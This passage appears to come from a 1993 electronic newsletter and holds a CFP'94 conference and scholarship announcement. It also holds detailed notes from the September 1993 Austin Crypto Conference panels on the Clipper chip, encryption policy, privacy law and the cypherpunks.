  4894. should be sent to: CFP'94,  The John Marshall Law School, 315 S.
  4895. Plymouth Ct., Chicago, IL 60604-3907
  4896. (Voice: 312-987-1419; Fax: 312-427-8307; E-mail: CFP94@jmls.edu)
  4897.  
  4898. ROOM RESERVATIONS: The Palmer House Hilton, located in Chicago's
  4899. "loop," and only about a block from The John Marshall Law School,
  4900. is the conference headquarters.  Room reservations only should be
  4901. made directly with the hotel, mentioning "CFP'94" to get the
  4902. special conference rate of $99.00, plus tax. (17 E. Monroe.,
  4903. Chicago, Il., 60603, Tel: 312-726-7500;  1-800-HILTONS;  Fax
  4904. 312-263-2556)
  4905.  
  4906.  
  4907.      NOTE: More specific information about conference program
  4908. content will be available December 1, 1993.
  4909.  
  4910. ***********
  4911. George B. Trubow, Professor of Law
  4912. Director, Center for Informatics Law
  4913. The John Marshall Law School
  4914. 315 S. Plymouth Ct.
  4915. Chicago, IL 60604-3907
  4916. Fax: 312-427-8307; Voice: 312-987-1445
  4917. E-mail: 7trubow@jmls.edu
  4918.  
  4919. ......SCHOLARSHIPS
  4920.  
  4921. The Conference on Computers, Freedom & Privacy (CFP'94) is pleased to
  4922. announce that it will once again provide a number of full tuition
  4923. scholarships for attendance at the conference. The conference will be held
  4924. in Chicago, IL from March 23rd through March 26th, 1995 and will be hosted
  4925. by the John Marshall Law School under the chairmanship of George Trubow.
  4926.  
  4927. The conference traditionally attracts an extremely diverse group of
  4928. persons concerned with issues relating to the rapid development of the
  4929. "information society"; civil libertarians, information providers, law
  4930. enforcement personnel, privacy advocates, "hackers", sociologists,
  4931. educators and students, computer professionals, cryptography advocates,
  4932. government policy makers and other interested parties have all played
  4933. major roles in the three previous conference.
  4934.  
  4935. Speakers at previous conferences have included Electronic Frontier
  4936. Foundation (EFF) co-founders John Perry Barlow and Mitch Kapor, FBI Deputy
  4937. Director William A. "Al" Bayse, writer Bruce Sterling, privacy advocate
  4938. Simon Davies, Harvard University law professor Lawrence Tribe, hacker
  4939. "Phiber Optik", Georgetown University's Dorothy Denning, "Cuckoo's Egg"
  4940. author Clifford Stoll, Prodigy counsel George Perry, USA Today founder Al
  4941. Neuwith, former FCC Chairman Nicholas Johnson, Computer Professionals for
  4942. Social Responsibility (CPSR)'s Marc Rotenberg, Arizona prosecutor Gail
  4943. Thackeray, and Bay Area Women in Computing's Judi Clark.
  4944.  
  4945. The scholarships are intended to provide access to the conference to those
  4946. that would like to attend the conference but are unable to afford the
  4947. tuition. They are available to undergraduate and graduate students in any
  4948. discipline (previous student attendees have come from computer science,
  4949. law, sociology, liberal arts, journalism, and womens' studies
  4950. backgrounds), law enforcement personnel, hackers, social scientists, and
  4951. others interested in the future of the information society.
  4952.  
  4953. Persons interested in a scholarship should send the following information
  4954. (e-mail greatly preferred) to:
  4955.  
  4956. John F. McMullen
  4957. Perry Street
  4958. Jefferson Valley, NY 10535
  4959.  
  4960. mcmullen@panix.com
  4961. (914) 245-2734 (voice)
  4962. (914) 245-8464 (fax)
  4963.  
  4964. 1. Personal Information -- Name, Addresses (including e-mail), Phone
  4965. Numbers, School and/or Business Affiliation
  4966.  
  4967. 2. Short Statement explaining what the applicant helps to get from CFP'94
  4968. and what impact that attendance may have in the applicant's community or
  4969. future work.
  4970.  
  4971. 3. Stipulation that the applicant understands that he/she is responsible
  4972. for transportation and lodging expenses related to the conference. The
  4973. scholarship includes tuition and those meals included with the conference.
  4974.  
  4975. 4. Stipulation that the applicant would not be able to attend the
  4976. conference if a scholarship is not granted. The applicant stipulates
  4977. that, if granted a scholarship, he /she will attend the conference.
  4978.  
  4979. 6. Stipulation that the applicant, if granted a scholarship, will provide
  4980. a contact John McMullen at the above e-mail address or phone numbers with
  4981. any questions.
  4982.  
  4983. The number of available scholarships will be determined by funding available.
  4984.  
  4985. -------------------------------------------------------------------------------
  4986.  
  4987. Notes from the Austin Crypto Conference, September 22, 1993
  4988.  
  4989. by Gregory W. Kamen
  4990.  
  4991. --- Dinosaur Warning ---
  4992.  
  4993. Disclaimer:  A lot of people here noted disclaimed what they said as "not
  4994. legal advice".  In addition, this was prepared from notes which were not
  4995. necessarily legible or complete, therefore I disclaim any responsibility
  4996. for misquoting or mistranscribing this information.  (If you don't like
  4997. it, you try typing "cypherpunks" over and over again :P).  Please note
  4998. that in Q & A sessions, the answers were relevant, though not always
  4999. responsive to the questions.  In addition, I state that this information
  5000. does not represent legal advice from me or solicitation of legal
  5001. representation, and does not necessarily represent the position of EFH,
  5002. EFF, EFF-Austin, the individual conference participants, or any living
  5003. person.
  5004.  
  5005. -----------
  5006.  
  5007. The room was set up to seat approximately 180 people.  It was essentially
  5008. full, and there were a few people standing--not bad for a Wednesday
  5009. afternoon.
  5010.  
  5011. There was a large (about 14 people) contingent from EFH present.
  5012.  
  5013. Steve Jackson opened the meeting with a few introductory remarks, among
  5014. which were that a subpoena had been served on Austin Code Works, a
  5015. publisher of cryptographic software.
  5016.  
  5017. We can expect to hear about the case in news magazines of general
  5018. circulation in about two months.
  5019.  
  5020. Bruce Sterling delivered the keynote address.
  5021.  
  5022. He began by establishing a context by defining cryptography:
  5023.  
  5024.      -- as secret coding to avoid the scrutiny of a long list of entities,
  5025.      -- as a way to confine knowledge to those initiated and trusted,
  5026.      -- as a means to ensure the privacy of digital communication, and
  5027.      -- as a new form of information economics
  5028.  
  5029. Sterling then noted that crypto is "out of the closet"
  5030.  
  5031.      -- it is heard of on the streets
  5032.      -- the government acknowledges it by bringing forth its Clipper chip
  5033.      -- it is in the hands of the people
  5034.      -- public key crypto is out there and commercially available
  5035.      -- the typical time to market from first publication of a new idea is
  5036. 20 years.  Diffie published the first public key crypto algorithm in 1975,
  5037. thus the target date for mass crypto would be 1995.  Bringing it to market
  5038. will require bringing of political pressure, lawsuits, and money.
  5039.  
  5040. Next, Sterling moved to the subject of the grand jury proceedings in San
  5041. Jose on 9/22.
  5042.  
  5043.      -- Export law violations have been alleged.  Whatever the outcome,
  5044. this proceeding is certainly not the end of the subject.
  5045.  
  5046. Finally, before closing by noting that EFF-Austin is not EFF, Sterling
  5047. shared a brief background of the panelists:
  5048.  
  5049.      -- they are people who can tell us about the future
  5050.      -- they are directors of national EFF and can share information
  5051. Panelists on First Panel
  5052.      -- Mitch Kapor - co-founder of EFF, software designer, entrepreneur,
  5053. journalist, philanthropist, activist.  He spoke out on obscure issues in
  5054. the beginning and made them seem less obscure.  He has done good deeds for
  5055. the public.
  5056.      -- Jerry Berman - President of EFF, activist background, published
  5057. widely on security and privacy issues, formerly active with ACLU, and is
  5058. on Clinton administration's National Information Infrastructure team.
  5059. Panelists on Second Panel
  5060.      -- Esther Dyson - journalist, has widely read project "Release 1.0",
  5061. is a guru in Europe.
  5062.      -- Mike Godwin - lawyer for EFF, veteran public speaker, attended UT-
  5063. Austin, on the board of EFF-Austin as well as EFF.
  5064. Panelists on Third Panel
  5065.      -- Eric Hughes - not EFF member, started cypherpunks mailing list,
  5066. from California
  5067.      -- John Gilmore - 20 year programmer, pioneer at Sun, civil
  5068. libertarian
  5069.      -- John Perry Barlow - co-founder of EFF, media junkie, and author.
  5070.  
  5071. PANEL #1:  POLICY
  5072.  
  5073. Kapor - Opening remarks:  Framing the issue
  5074.  
  5075.      a. Series of conferences in Washington, briefed EFF on how laws are
  5076. made, at a technical level of the process.  Berman was instrumental in
  5077. passing the ECPA, which was later used successfully in Steve Jackson Games
  5078. case.
  5079.      b. ECPA is a good thing: it says Email should be as private as postal
  5080. mail.  However, it doesn't go far enough because it is easy to listen in
  5081. on cell phones.
  5082.      c. Kapor felt need technology to protect privacy.  Laws alone are not
  5083. enough.  Berman stated view (at that time.  He has since changed his mind)
  5084. widely held within the Beltway that laws were sufficient.
  5085.      d. Survey:  20 percent of those present use PGP.  80 percent have
  5086. heard of PGP.
  5087.  
  5088. Berman -
  5089.  
  5090.      a. Following on Kapor's point that ECPA was soft, Berman says the
  5091. politicians will remain clueless until we educate them.  If it is
  5092. knowledge that can alter the political process, it must be done.
  5093.      b. EFF established a Washington presence because policy is being made
  5094. to design and govern the electronic frontier by the big commercial
  5095. players.  The public and the consumer are not represented.
  5096.      c. We're working on a goal that the national information
  5097. infrastructure serve the public interest.  For example, if the big players
  5098. are allowed to dominate the process, they will control access and the NII
  5099. will look like 500 cable channels rather than a point-to-point switched
  5100. network like Internet.
  5101.      d. There's a big battle coming:  computers and communication are in
  5102. abundance such that everyone can be a publisher.  This raises at the very
  5103. least a First Amendment issue.
  5104.      e. The Clipper Chip
  5105.      -- has great potential for the net; however, government agencies are
  5106. not sure of control
  5107.      -- privacy and security are essential for development of the national
  5108. information infrastructure.  This is a threat to the law enforcement
  5109. community.
  5110.      -- the response of the law enforcement community has been to attempt
  5111. to throttle the technology.
  5112.      -- in order to capture the future, they want to develop the
  5113. technology themselves.
  5114.      -- EFF's role has been to say that we shouldn't go ahead with the
  5115. Clipper chip proposal.
  5116.      -- the ultimate big question:  What to do when all communications are
  5117. encrypted.
  5118.      -- Clinton led off with a study of cryptography policy and introduced
  5119. the Clipper chip at the same time, which demonstrates that the policy was
  5120. already determined in the opinions of many.  It was introduced not as
  5121. something being studied, but as a fait accompli.
  5122.      -- Clipper proposal is bad because it is based on a secret algorithm
  5123. which has not been subjected to adequate scrutiny, it is counterintuitive
  5124. to interoperability because stronger crypto is being developed outside the
  5125. United States, and it includes a key escrow provision that includes only
  5126. "insiders" who developed the technology.
  5127.      -- We don't prescreen the content of communications.  The law
  5128. enforcement community needs a warrant.  That is fundamental to the First,
  5129. Fourth, and Fifth Amendments.
  5130.      f. We oppose the Clipper/Skipjack chip
  5131.      -- there's no evidence showing that law enforcement will be unduly
  5132. hampered in its efforts to stop crime if crypto is available.
  5133.      -- the positive and negative implications of widespread crypto have
  5134. not been considered.
  5135.      -- law enforcement may have a problem, but if they have a warrant
  5136. they should be able to get access.
  5137.      -- as long as Clipper is not mandated, people can use other types of
  5138. crypto.
  5139.      g. Conclusions
  5140.      -- if Clipper is voluntary, it doesn't work, because people who want
  5141. to encrypt safely will use other products.
  5142.      -- if Clipper is mandated, there are serious constitutional issues.
  5143.      -- Even if the Clipper chip proposal fails, we still lose under the
  5144. current scheme, because the export control laws guarantee that we will not
  5145. have crypto interoperable with the rest of the world.
  5146.      h. EFF chairs a large coalition including representatives of
  5147. Microsoft, IBM, and ACLU to work against this.
  5148.      i. Congress only needs one bad case, like a terrorist attack, to go
  5149. the other way.
  5150.  
  5151. Q & A -
  5152.  
  5153. Q. Is the key in the hardware or software with Clipper?
  5154.  
  5155. A. It's in the hardware, therefore the instrument is permanently
  5156. compromised once the keys are released from escrow.  The law enforcement
  5157. arguments are really fronts for NSA and their religious commitment to
  5158. prevent the spread of crypto.  It's NSA's mission to make sure it "busts"
  5159. every communication in the world, therefore why would they propose any
  5160. encryption without a "back door" through which they could decipher all
  5161. transmissions.
  5162.  
  5163. Q. What is the current state of the law between NIST and NSA?
  5164.  
  5165. A. NSA was selling "secure" phones.  They wanted a new classification of
  5166. information.  Responsibility for classified systems rests with NSA.  NIST
  5167. is brought in to handle domestic crypto.  In terms of budget and
  5168. experience, however, NSA is dominant, and NIST relies on them.
  5169.  
  5170. Q. How does GATT relate to the Clipper proposal
  5171.  
  5172. A. It's not dealt with in GATT.  There's no agreement on an international
  5173. standard.
  5174.  
  5175. Q. What's going on with PGP?
  5176.  
  5177. A. Pretty Good Privacy is the people's crypto.  It was independently
  5178. developed, and has been widely distributed for our information and
  5179. security.  There are two current controversies regarding PGP.  First is
  5180. whether it is subject to export controls, and second is its intellectual
  5181. property status.
  5182.  
  5183. Q. What facts do we have regarding the history of Clipper?
  5184.  
  5185. A. The project began during the Bush administration after AT&T introduced
  5186. phones implementing DES, the Data Encryption Standard.  Clinton looked at
  5187. it early in his administration.  NSA pushed the program, and the staff
  5188. wanted to "do something".  A worst-case scenario about the introduction of
  5189. Clipper is that it was leaked to the press, and the story about a study
  5190. was cooked up to cover the leak.  People might be surprised about how
  5191. little expertise and thought about issues goes on.  Policy makers operate
  5192. under severe time constraints, handling the crisis of the moment.  Most of
  5193. them are reasonable people trying to do the best thing under the
  5194. circumstances.  If we push certain ideas long enough and hard enough we
  5195. can affect the outcome.
  5196.  
  5197. Q. Following the _AMD v. Intel_ case, there's nothing stating you cannot
  5198. clone the Clipper chips to circumvent the law enforcement field, correct?
  5199.  
  5200. A. It's difficult to say.  The chips have not yet been delivered.  There
  5201. have been technical problems with the chip.  At NIST hearing a couple
  5202. weeks ago, Dorothy Denning revealed that she had reviewed the Skipjack
  5203. algorithm alone because the other four cryptographers selected to review
  5204. the algorithm were on vacation.  There's a certain degree of cynicism
  5205. because the government has said it will twist people's arms using its
  5206. purchasing power and the threat of prosecution to establish Skipjack as a
  5207. de facto standard.  EFF is trying to get AT&T and Motorola to do
  5208. something.  Maybe the chip cannot easily be cloned.  John Gilmore wants to
  5209. see how easy it is to reverse engineer.
  5210.  
  5211. Q. What are specific steps that can be taken?
  5212.  
  5213. A. Send Email to the White House, and cc to EFF.  Also, focus on the
  5214. debate concerning ownership and leasing of the national information
  5215. infrastructure.  Southwestern Bell wants authority to own and lease the
  5216. net and isn't quite sure whether government should be involved.  This is
  5217. the other longest-running EFF policy concern:  the owner of the electronic
  5218. highways shouldn't be able to control content.  Bandwidth should be
  5219. provided based on the principles of common carriage and universal access.
  5220. Construction of the NII should be done by the private sector because
  5221. government doesn't have the resources available.  We can't allow ourselves
  5222. to be limited to upstream bandwidth.  The net should retain those of its
  5223. characteristics equivalent to BBS's.
  5224.  
  5225. Q. If NIST is to be an escrow agent, why are they not secure?
  5226.  
  5227. A. This is a source of moral outrage, but moral outrage only goes so far.
  5228. We need to swallow our distaste for dealing with the government to
  5229. compromise.  It is worthwhile to get involved in the decision-making
  5230. _process_.
  5231.  
  5232. Q. What is the position of the ACLU and Republican think tanks on Clipper?
  5233.  
  5234. A. A lot of organizations have bumped into NII.  ACLU is fighting the
  5235. Clipper chip.  For other organizations, it's not a top priority item.
  5236.  
  5237. Q. With regard to DES:  Export restrictions apply to scramblers, but they
  5238. are exported anyway.  Why this policy of selective enforcement?
  5239.  
  5240. A. Don't look for consistency.  SPA has recognized that there are 231 DES-
  5241. equivalent products.  The genie is out of the bottle.  DES source is
  5242. widely available, but more so inside the US than outside.
  5243.  
  5244. Q. If the government has their way, what good products are out there for
  5245. us?
  5246.  
  5247. A. The government can only have its way by mandating use of Skipjack.  If
  5248. it holds up, legally and politically, there _is_ no alternative.  The
  5249. government is saying that it is considering banning the use of crypto
  5250. other than Skipjack, but has not yet adopted such a policy.
  5251.  
  5252. Q. If crypto is a munition, is it protected under the Second Amendment?
  5253.  
  5254. A. The Second Amendment probably doesn't affect the export question.
  5255.  
  5256. Q. Are there any legal weaknesses in the public key cryptography patents?
  5257.  
  5258. A. EFF has its hands full with other issues and hasn't really formulated
  5259. an answer to this, but believes there's a fatal weakness as to all
  5260. software patents.  However, it would be prohibitively expensive to make
  5261. such a case at this time.
  5262.  
  5263. Q. Do we need different copyright laws because of encryption?
  5264.  
  5265. A. Recognize that without changes in the copyright law, it will be
  5266. difficult to get a true net economy going.  Producers want a way to make
  5267. money from the net.  Consumers want the equivalent of home taping.  It's
  5268. tough to cover all the bases.
  5269.  
  5270. Q. How do law enforcement issues in civil cases relate?
  5271.  
  5272. A. This is an interesting point because the line between a commercial
  5273. dispute and a criminal act are fuzzy.  There are dangers in obtaining a
  5274. wiretap.  The law enforcement community shouldn't have a case to tap a
  5275. line in the event of a two-party dispute.  There is a danger of misuse for
  5276. traffic analysis of calls.
  5277.  
  5278. Q. ECPA could have been used to regulate access to the airwaves.  Has it
  5279. been tested against the First Amendment?
  5280.  
  5281. A. This demonstrates that technological security measures, rather than
  5282. merely laws, are needed.  People have listened to cell phone calls with
  5283. scanners, and they made scanners illegal to manufacture, but cell phones
  5284. can be modified to act as scanners.  Experimentation of privacy with
  5285. encryption shifts the balance.  RSA is available outside the US.  RICO is
  5286. being overused.
  5287.  
  5288. PANEL #2:  INDUSTRIAL AND LEGAL ISSUES
  5289.  
  5290. Dyson - Beyond commercial people being citizens, there are three big
  5291. issues:
  5292.  
  5293. 1. Protection of trade secrets
  5294. 2. Intellectual property protection for net businesses and database
  5295. information
  5296. 3. Exporting encryption devices: US businesses like to do business
  5297. overseas.  It is cost ineffective to develop a US-only standard.  There is
  5298. better encryption available in Russia and Bulgaria on BBS's.
  5299.  
  5300. Godwin - Talking about law enforcement arguments government makes.  There
  5301. are general issues regarding computers, communication, and privacy greater
  5302. than just Clipper.
  5303.  
  5304.      -- Godwin is the first person people talk to when they call EFF in
  5305. trouble.  In addition to giving a lot of general information regarding
  5306. liability, he monitors the intake of cases for EFF.  He talks at
  5307. conventions about criminal and constitutional issues.
  5308.      -- This effort has produced at least one change already:  law
  5309. enforcement personnel are no longer completely incompetent and clueless
  5310. about computers.
  5311.      -- the most interesting are issues dealing with hackers and crypto.
  5312. FBI's involvement with digital telephony:  they wanted to make it more
  5313. wiretap friendly.  They discovered it is worthless without a restriction
  5314. on encryption, and Clipper was introduced a short time later.
  5315.  
  5316. Legal History
  5317.  
  5318.      The right to communications privacy is a fairly new thing.  The
  5319. Supreme Court faced it in the 1928 _Olmstead_ case, and held that
  5320. there was no Fourth Amendment interest to be protected at all because
  5321. there was no physical intrusion on the property.  The doctrine has bee
  5322. reveisited a number of times since then.
  5323.      -- a suction cup mike next door to the defendant's apartment produced
  5324. the same holding.
  5325.      -- In a later case of a "spike mike" penetrating the heating duct of
  5326. the defendant's apartment, the Court held that the Fourth Amendment
  5327. applied but did not extend general Fourth Amendment protection.
  5328.      Finally in the _Katz_ case in the late 60's the Court formulated its
  5329. present doctrine in holding that the defendant has a reasonable
  5330. expectation of privacy in a phone booth.  The Court said that the Fourth
  5331. Amendment protects people, not places.  Justice Brandeis, in dissent,
  5332. cited Olmstead, but also noted that "The right most prized by civilized
  5333. men is the right to be let alone."
  5334.  
  5335. Arguments regularly advanced by law enforcement types in favor of Clipper:
  5336.  
  5337. 1. Wiretapping has been essential in making many cases.
  5338.      -- this argument seems reasonable.
  5339.  
  5340. 2. Even if they can't point to a case now, they are taking a proactive
  5341. approach, trying to anticipate problems rather than reacting.
  5342.      -- Dorothy Denning was involved early on in framing the issues.  Now
  5343. she's in favor of the government line.  Point is that an attitude of "us
  5344. vs. them" is counterproductive.
  5345.  
  5346. 3) There are nuclear terrorists out there
  5347.      -- this argument is the result of false reasoning.  Like Pascal's
  5348. wager, the price of guessing wrong is so high that the rational person
  5349. chooses to be a believer, even where the probability is very low.
  5350.      -- the problem with it is that you can't live that way.  There's not
  5351. necessarily one single right answer.  Also there is a substantial
  5352. opportunity cost.  Whenever you empower individual rights, there's a
  5353. tradeoff against government efficiency.  As an example, take the case of
  5354. compelled confession.  It would be very efficient for the government to be
  5355. able to compel a confession, but the cost in individual rights is too
  5356. high.  There is no constitutional precedent on which to base the outlawing
  5357. of encryption.  The way it ought to be, the law enforcement types should
  5358. have the right to try to intercept communications under certain
  5359. circumstances, but they should have no guarantee of success.
  5360.  
  5361. 4) Wiretapping has created an entitlement to have access to the
  5362. communications:  this argument is blatantly ridiculous.
  5363.  
  5364. Q & A
  5365.  
  5366. Q. Before the A-bomb was built, proponents said that it would cost $1
  5367. million to build.  The eventual cost was $1 billion.  Congress asked what
  5368. was the probability that it could work, and was told 1 in 10.  Thus the
  5369. nuclear terrorist argument works, right?
  5370.  
  5371. A. Terrorists won't use Clipper
  5372.  
  5373. Q. NSA has had scramblers working.  Why does it hurt for us to have the
  5374. devices?
  5375.  
  5376. A. We're not opening Pandora's Box.  Encryption is already out there.
  5377. They think the majority of communications are not encrypted now.
  5378. Encryption will create a bottleneck, which will change the way law
  5379. enforcement does its job.
  5380.  
  5381. Q. What about the Davis case in Oklahoma? If convicted is there any chance
  5382. for parole?
  5383.  
  5384. A. Davis was a BBS owner prosecuted because he allegedly had obscene
  5385. material on his board.  I don't know about Oklahoma parole law.
  5386.  
  5387. Q. What is the current legal status of PGP?
  5388.  
  5389. A. That will be answered later.
  5390.  
  5391. Q. If "only outlaws will have crypto", how effectively can the clamp down?
  5392.  
  5393. A. It will probably be very easy for them to chill nonstandard crypto if
  5394.      -- they investigate for another crime and find it, or
  5395.      -- it may itself be probable cause for a search.
  5396.  
  5397. Q. Doesn't a lot of this boil down to "you wouldn't be encrypting if you
  5398. had nothing to hide"?
  5399.  
  5400. A. There's not any probable cause for law enforcement taking that
  5401. position.  Business likes crypto.  In a scenario where only certain types
  5402. of crypto are allowed, there could presumably arise a presumption from
  5403. nonstandard crypto.  The more people who encrypt, the more will say it is
  5404. all right.
  5405.  
  5406. Q. Do you get the sense that there is a political will to protect privacy
  5407. in this country?
  5408.  
  5409. A. It is not clear that is the case.  There is a real education hurdle to
  5410. teach the importance of technology.
  5411.  
  5412. Q. The law enforcement aspect is not important to NSA, right?
  5413.  
  5414. A. The Russians and the Japanese have done more theoretical work.  Read
  5415. "The Puzzle Palace"
  5416.  
  5417. Q. Virtual communities and net businesses need crypto on all systems to
  5418. validate digital signatures.
  5419.  
  5420. A. It is not required universally.  It will become cheaper as digital
  5421. signatures take off.  The Clipper proposal does not address digital
  5422. signatures.  NIST is also talking to IRS about helping implement Clipper
  5423. by extending the ability to file tax returns electronically to those using
  5424. Clipper.
  5425.  
  5426. Q. What restrictions are there right now on the IMPORT of crypto?
  5427.  
  5428. A. None right now.
  5429.  
  5430. Q. Is law enforcement misuse of commercial information anticipated?
  5431.  
  5432. A. It is a wash.  There are laws available to protect against such things,
  5433. like the Electronic Funds Transfer laws, and also that the wiretap law
  5434. requires eventual notification of the tap.  That's why they have called
  5435. for two escrow agents.  The weakness is that people can be compromised.
  5436. The answer to law enforcement is that you could have more than two escrow
  5437. agents to make the bribe prohibitively expensive.  Also the problem of
  5438. human weakness is not unique to the Clipper chip or key escrow systems.
  5439.  
  5440. Q. There's no mapping between the chip and the phone, correct?
  5441.  
  5442. A. The only link is the word of the officer seeking a warrant.  There is
  5443. no provision right now for a database containing identities of all chips.
  5444.  
  5445. Q. Can the President or Congress outlaw encryption by Executive Order?
  5446.  
  5447. A. The president cannot by Executive Order.  It's not clear whether
  5448. Congress could constitutionally.
  5449.  
  5450. Q. What about steganography?
  5451.  
  5452. A. Steganography is defined as a message appearing to be unencrypted but
  5453. containing a code.  There's a constant competition between the law
  5454. enforcement community and the criminal element to stay ahead on the
  5455. technology.
  5456.  
  5457. Q. Are one time pads illegal, or covered by export regulations?
  5458.  
  5459. A. No.  Few policymakers have ever heard of them.
  5460.  
  5461. Q. What's a vision of what we would like to see?
  5462.  
  5463. A. Try to give people a technological means to protect their own privacy.
  5464. Freedom to exchange information.  Communities conforming to a standard
  5465. without oversight, so that we can export.
  5466. Godwin - more mystical approach.  In person, you can be sure of someone's
  5467. identity.  This creates intimacy.  Technology has the potential to free
  5468. intimacy from the accident of geography.  With crypto, you know the
  5469. identity of the other person, and that you're not being overheard.
  5470.  
  5471. Q. Who are the law enforcement people you've been dealing with?  Do they
  5472. represent the highest levels of their organizations?
  5473.  
  5474. A. (Godwin) I don't claim to know what NSA thinks.  I have talked to FBI,
  5475. state and local law enforcement authorities, and they all say the same
  5476. things.
  5477.  
  5478. PANEL #3:  CYPHERPUNKS
  5479.  
  5480. Barlow - Doesn't have the I/O bandwidth to be a cypherpunk.  Doesn't know
  5481. how they do it.  The net is the biggest technological development since
  5482. fire.  There's a very difficult choice to be made, and it may already be
  5483. made:  Either anything is visible to anyone who is curious, or nothing is
  5484. visible.  Barlow comes from a small town.  He's not bothered by privacy
  5485. invasions at that level.  But there's a difference between locals and the
  5486. possessors of a database.
  5487.      The problem of giving up privacy (which without encryption will
  5488. happen), is that it allows "them" to protect us from ourselves.  Also, no
  5489. matter how benevolent the current government may be, there will always be
  5490. a corrupt one down the road.  Hidden crypto economies could break most
  5491. governments.  It's not necessarily good to have no government either.
  5492.      What drives the cypherpunks is a law of nature:  Anarchy is breaking
  5493. out, and Barlow is one.  However, the libertarian impulse begs a few
  5494. questions about crypto: What are we trying to hide, from whom, and why?
  5495.      There are a lot of victimless crimes out there for which no one wants
  5496. to take responsibility.
  5497.      Barlow wants crypto to create trust in identity.  The real cypherpunk
  5498. question is:  The war is over, and we have won.  How do we make the
  5499. transition of power graceful?  Human nature is to acquire some power
  5500. structure of some kind.  It is critical to acquaint friends and those who
  5501. could care less with crypto.
  5502.  
  5503. Gilmore - There are too many laws, and they make the wrong things illegal;
  5504. We need to explain.  In the existing system, the natural outgrowth has
  5505. been for cypherpunks to be labeled as "them".  Gilmore's vision is
  5506. unprecedented mobility by creating privacy and authenticity at a distance.
  5507. Thus you don't have to live near work, or play near home.  By focusing on
  5508. conspirators, the law enforcement community loses the focus on business
  5509. use.  The formal topic of the panel is cypherpunks.
  5510.      -- Crypto is not all that hard.  Denning's book shows how to
  5511. implement DES and RSA.
  5512.      -- Cypherpunks push the limits - taking cryptography from theory into
  5513. the realm of the practical.
  5514.      -- Trying to put crypto in the hands of the people, so that the
  5515. government cannot take it back.  That's why PGP is freely distributed.
  5516.      -- Also working on anonymity and digital money schemes.
  5517. The areas the cypherpunk group has worked on are:
  5518.      1) Anonymity - anonymous Email.  What is the impact on how we
  5519. communicate?  Most of the debate has been relatively uninformed.  The
  5520. Supreme Court thinks there is a right of anonymity.  A Los Angeles law
  5521. requiring that demonstrators who handed out flyers put their name and
  5522. address on the flyers was overturned on the grounds that it chilled free
  5523. speech.  In other media, telephones are anonymous.  There has been a big
  5524. ruckus with Caller ID.  The postal service does not enforce return address
  5525. requirements.  Telegrams and radio are similarly anonymous.
  5526.      2) Privacy - Have been implementing key exchange systems for PGP,
  5527. experimenting with encrypted audio.  Digital cash systems - so many
  5528. businesses would pop up on the net if it was possible to spend electronic
  5529. money.  There are people working on the legal aspects of it now.
  5530.      3) Outreach - a mailing list, contributing articles to Village Voice,
  5531. Wired, Whole Earth News.
  5532.      4) Government interaction - Sent a list of questions regarding
  5533. Clipper to NIST.  Made several requests under the Freedom of Information
  5534. Act.  Someone searched the dumpsters at Mykotronx.  In a recent FOIA
  5535. request to an Assistant Secretary of Defense, we learned that the law
  5536. enforcement and intelligence communities advocate making Clipper
  5537. mandatory.  There's a FOIA request in now on Clipper.  FBI returned a
  5538. clipping file, but says it will take 3 1/2 years to process and release
  5539. all the documents requested.
  5540.      5) Future projects - Building encrypted phones using PGP.  Real
  5541. digital banking.  Automating anonymity and making an easier to use
  5542. interface for anonymized mail.  Tightening security from machine to
  5543. machine protocols - Right now they transmit cleartext.  At Gilmore's home
  5544. machine at Cygnus recently, a hacker monitored a session remotely, then
  5545. installed a daemon to monitor the first 200 bytes of ethernet traffic from
  5546. each connection.  The daemon was removed, and the problem fixed using
  5547. kerberos.
  5548.  
  5549. Hughes - Cypherpunks was created by Hughes and Tim May.  It's surprising
  5550. how much media attention we have gotten.  They knew what they were doing
  5551. was significant, but not that so many people thought so.  They are now
  5552. shooting a pilot for a TV show based on cypherpunks, and Hughes has held
  5553. himself out as a media expert.  Here are a few obvious things that
  5554. nonetheless need to be stated:
  5555.  
  5556.      1) In order to have a private key, you need to have your own CPU.  To
  5557. put your key online where someone else has physical access is dumb.
  5558. Therefore, one of the consequences is that digital privacy is only for the
  5559. rich.
  5560.      2) Cypherpunks is not a "hacker privacy league", but rather seeks to
  5561. ensure privacy for all.  Crypto must be easy to use.  It is just now
  5562. feasible to have an anonymous remailer.  The user interface _must_ be
  5563. easy.  The layperson's concept of security is that if the computer is not
  5564. networked, it is secure.  They don't see how much of a disadvantage it is
  5565. not to be networked.  Gibson calls non-networked computers "dead silicon".
  5566. Therefore, encryption needs to be transparent to the user.  The
  5567. cypherpunks mailing list reached critical mass about 2 months ago with
  5568. enough people understanding the concepts to move forward.  We're at a
  5569. crossroads historically now.
  5570.      3) If you're the only one using crypto, it must be you who sent the
  5571. cryptographic message.  Anonymity is a social construct, and it doesn't
  5572. work unless many people do it.  The government is good at suppressing
  5573. small things, but bad at suppressing big things.  Therefore the best
  5574. course of action is to spread the word.  In the end, most of us will be
  5575. private or most will not.  If encryption is available to you, use it.
  5576.  
  5577. In response to Dyson on the question of copyright:  Copyright is dead, or
  5578. at least moribund.  It will not exist as we know it in 100 years.  It is
  5579. a means of using the government's power to suppress expression.  You still
  5580. will be able to sell the timeliness of information, indexing, delivery,
  5581. etc.
  5582.  
  5583. Gilmore - If we decide to be private, the only limit to secrecy is
  5584. individual conscience.
  5585.  
  5586. Comments from the audience:
  5587.  
  5588.      -- As it becomes less possible to hold on to information, marketing
  5589. shifts toward a relationship rather than a product.
  5590.      -- If we want to make encryption easy, put out a mailer which
  5591. supports it.  (Response: We're working on it)
  5592.  
  5593. Q & A
  5594.  
  5595. Q. Can public keys be made available through the Domain Name Servers?
  5596.  
  5597. A. PGP developers are working on it.  Internet is an information motel.
  5598. Data checks in, but it doesn't check out.
  5599.  
  5600. Q. Is it possible to keep secrets at all?
  5601.  
  5602. A. The larger an organization is, the tougher it is to keep a secret.
  5603. Secrecy and digital signatures are not exactly related.  One thing we may
  5604. see if pointers to specific documents which contain self-verifying
  5605. information.  These will change the balance of power.
  5606.  
  5607. Q. Can we sell strong crypto to Clinton as part of his national ID card
  5608. for health care program?
  5609.  
  5610. A. There's a problem in dealing with the administration right now, because
  5611. they are currently defending a position and it will be tough to change.
  5612. A parallel development may make the difference.  Congress is getting
  5613. Email.  Seven or eight congressmen have access.  A push to implement
  5614. crypto to determine who is from the districts represented should come
  5615. soon.  A lot of this type application is based on the blind signature work
  5616. of David Chaum.
  5617.  
  5618. Q. What's the status with the legality of PGP vs. RSA?
  5619.  
  5620. A. It is unsettled.  There are two issues: patent infringement and export.
  5621. RIPEM uses RSAREF, which is a watered down version of RSA.  They're
